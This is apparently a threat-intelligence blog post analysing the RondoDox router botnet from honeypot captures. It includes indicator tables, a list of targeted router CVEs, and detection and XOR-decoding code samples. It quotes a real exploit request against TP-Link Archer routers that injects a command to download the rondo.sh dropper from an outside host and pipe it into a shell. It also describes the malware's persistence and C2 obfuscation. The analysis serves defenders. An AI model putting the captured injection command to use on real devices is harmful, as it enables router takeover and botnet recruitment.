
RondoDox Botnet: Rando In Your Router

The RondoDox botnet is a network of compromised Internet-connected devices, including MIPS-based embedded systems such as routers and IoT devices. Our honeypot data shows RondoDox attempting to compromise systems by exploiting vulnerabilities or weak credentials to gain control over devices, which can then be used for activities like DDoS attacks, spam campaigns, credential stuffing, or illicit cryptocurrency mining. Since June 2025, Sicehice has seen an uptick in exploitation of common router CVEs that leads to RondoDox botnet infections. The malware infects the target device with a dropper-like shell script that downloads a final stage payload.

Sicehice observed the first evidence of RondoDox as early as 2025-06-04 02:43:31. The activity originated from the following source IP addresses:

| IP | AS | Country |
|---|---|---|
| 45.135.194.11 | AS 51396 (Pfcloud UG) | The Netherlands (NL) |
| 45.135.194.34 | AS 51396 (Pfcloud UG) | The Netherlands (NL) |



We note that the two IP addresses are in the same /24 subnet. Looking at other IPs involved in exploitation activity from the same subnet, several additional addresses of interest appear. Although none of them has been confirmed as RondoDox infrastructure, the pattern suggests an organized effort in which the threat actor operates from IP addresses in AS 51396 (Pfcloud UG).



The following request is an example of the rondo.sh dropper being downloaded from 45.8.145.203 and subsequently executed:
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink.8080%3B%29

Decoded: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall -9 mipsel mpsl;(wget -O- http://45.8.145.203/rondo.sh||busybox wget -O- http://45.8.145.203/rondo.sh||curl http://45.8.145.203/rondo.sh) | sh -s tplink.8080;)
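As an added example (not code from the original post), the Python check below decodes a request like the one above, flags the command substitution injected into the country parameter and the empty stok token in the path, and pulls out the dropper URLs. Both sample request lines are constructed for this example; the first is copied from the capture above, the second is a benign request that must not trigger.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed honeypot request lines for this example. The first reproduces the
# TP-Link Archer request quoted above; the second is a benign LuCI request with a
# real-looking session token and no injected command, so it must not trigger.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country="
    "%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203"
    "%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh"
    "%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink.8080%3B%29",
    "GET /cgi-bin/luci/;stok=0123456789abcdef/admin/status?form=status",
]

# Command substitution, backticks, "||" fallback chains, or a pipe into a shell.
INJECTION_RE = re.compile(r"\$\(|`|\|\||\|\s*(?:busybox\s+)?sh\b")
# Stop a URL at shell metacharacters so "http://x/rondo.sh||busybox" yields only the URL.
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
# Downloaders the dropper chains with "||" until one of them succeeds.
FETCHERS = ("wget", "busybox wget", "curl", "tftp")

def analyse_request(line: str):
    """Return indicator details for a request that injects a dropper fetch, else None."""
    method, _, target = line.partition(" ")
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are percent-decoded
    for name, values in params.items():
        for value in values:
            if not INJECTION_RE.search(value):
                continue
            urls = []
            for url in URL_RE.findall(value):
                if url not in urls:
                    urls.append(url)
            return {
                "method": method,
                "path": unquote(parts.path),
                "param": name,
                "unauthenticated_stok": ";stok=/" in parts.path,  # empty token, as in the capture
                "fetchers": [f for f in FETCHERS if f in value],
                "dropper_urls": urls,
                "dropper_names": sorted({u.rsplit("/", 1)[-1] for u in urls}),
            }
    return None

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(analyse_request(req))
```

The extracted dropper URLs and file names can be matched against the IoC list at the end of this post, and the same function can be run over any web or honeypot log that records the raw request target.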


In our payload captures, we have seen RondoDox targeting various router manufacturers, including but not limited to: Dasan, ZyXEL, Four-Faith, LB-Link, TP-Link, NETGEAR, D-Link, and Linksys. The dropper scripts exist in many variants, each apparently tailored to a particular router manufacturer; below is a screenshot of a generic RondoDox dropper shell script:


Once the dropper is executed, a final stage payload is downloaded for the target system’s architecture. Fortinet previously published a thorough article on RondoDox; decoding the C2 address in our samples with the XOR key “rondo” yields the same C2 that Fortinet reported:
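The decoder below is an added example, not Fortinet's or Sicehice's code: it applies the repeating XOR key “rondo” at every possible alignment over a byte blob and keeps the printable runs that appear, then filters for host:port shaped strings. The C2 string and the surrounding bytes it works on are constructed placeholders, not indicators from any sample.

```python
import re

KEY = b"rondo"  # the XOR key reported for RondoDox C2 strings (see above)

def xor_with_key(data: bytes, key: bytes = KEY, offset: int = 0) -> bytes:
    """Repeating-key XOR. `offset` chooses which key byte lines up with data[0];
    XOR is its own inverse, so the same call both obfuscates and recovers."""
    return bytes(b ^ key[(i + offset) % len(key)] for i, b in enumerate(data))

def recover_strings(blob: bytes, key: bytes = KEY, min_len: int = 8) -> list:
    """Try every key alignment over the whole blob and return the printable ASCII
    runs that appear; the true C2 string decodes cleanly at exactly one alignment."""
    run_re = re.compile(rb"[ -~]{%d,}" % min_len)
    found = []
    for offset in range(len(key)):
        for match in run_re.finditer(xor_with_key(blob, key, offset)):
            text = match.group().decode("ascii")
            if text not in found:
                found.append(text)
    return found

HOST_PORT_RE = re.compile(r"^[A-Za-z0-9.\-]+:\d{1,5}$")

def c2_candidates(strings) -> list:
    """Keep only host:port shaped strings, which is the form the C2 address takes."""
    return [s for s in strings if HOST_PORT_RE.match(s)]

# Constructed sample: a placeholder C2 string (not a real RondoDox indicator) XORed
# with "rondo" and padded with high bytes that stay non-printable under every key byte.
FILLER = bytes(range(0x80, 0x90))
SAMPLE_C2 = b"c2.example.invalid:6667"
SAMPLE_BLOB = FILLER + xor_with_key(SAMPLE_C2) + FILLER

if __name__ == "__main__":
    print(recover_strings(SAMPLE_BLOB))
    print(c2_candidates(recover_strings(SAMPLE_BLOB)))
```

Wrong alignments decode real text into near-printable garbage, which is why the host:port filter is applied after the run extraction rather than trusting every printable run.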




While the sample detailed by Fortinet has the same C2, we also observed other samples that have a different contact email address (bang2012@protonmail.com) listed under /tmp/contact.txt:




For persistence, we see /etc/init.d/rondo being created to include a startup script that allows the malware to run at boot:




We have identified the following products and associated CVEs being targeted by RondoDox:


| URI | Product | CVE |
|---|---|---|
| /GponForm/diag_Form?images/ | Dasan GPON routers | CVE-2018-10561 |
| /UD/act?1 | ZyXEL/eir D1000 routers | CVE-2016-10372 |
| /apply.cgi | Four-Faith routers | CVE-2024-12856 |
| /cgi-bin/ViewLog.asp | Zyxel P660hn-t V1 routers | CVE-2017-18368 |
| /goform/set_LimitClient_cfg | LB-Link routers | CVE-2023-26801 |
| /tmUnblock.cgi | Linksys E-Series routers | CVE-2025-34037 |
| /cgi-bin/luci/;stok=/locale?form=<truncated> | TP-Link Archer AX21 routers | CVE-2023-1389 |



Indicators of Compromise

IOCs gathered from our honeypots have also been added to a VirusTotal Collection.


Dropper URLs:


Payload URLs:

IP Addresses:


| IP | AS | Country |
|---|---|---|
| 14.103.145.202 | AS 4811 (China Telecom Group) | China (CN) |
| 14.103.145.211 | AS 4811 (China Telecom Group) | China (CN) |
| 37.32.15.8 | AS 202468 (Noyan Abr Arvan Co. (Private Joint Stock)) | Iran (IR) |
| 38.59.219.27 | AS 4226 (SUMOFIBER) | United States (US) |
| 45.8.145.203 | AS 44477 (Pq Hosting Plus S.r.l.) | The Netherlands (NL) |
| 78.153.149.90 | AS 207713 (Global Internet Solutions LLC) | Russia (RU) |
| 154.91.254.95 | AS 54801 (ZILLION-NETWORK) | Seychelles (SC) |
| 169.255.72.169 | AS 327829 (SKYTIC-TELECOM) | Congo Republic (CG) |
| 83.150.218.93 | AS 199415 (Association YORKHOST) | France (FR) |
| 45.135.194.11 | AS 51396 (Pfcloud UG) | The Netherlands (NL) |
| 45.135.194.34 | AS 51396 (Pfcloud UG) | The Netherlands (NL) |


Hashes:


Emails:

bang2012@protonmail.com
vanillabotnet@protonmail.com
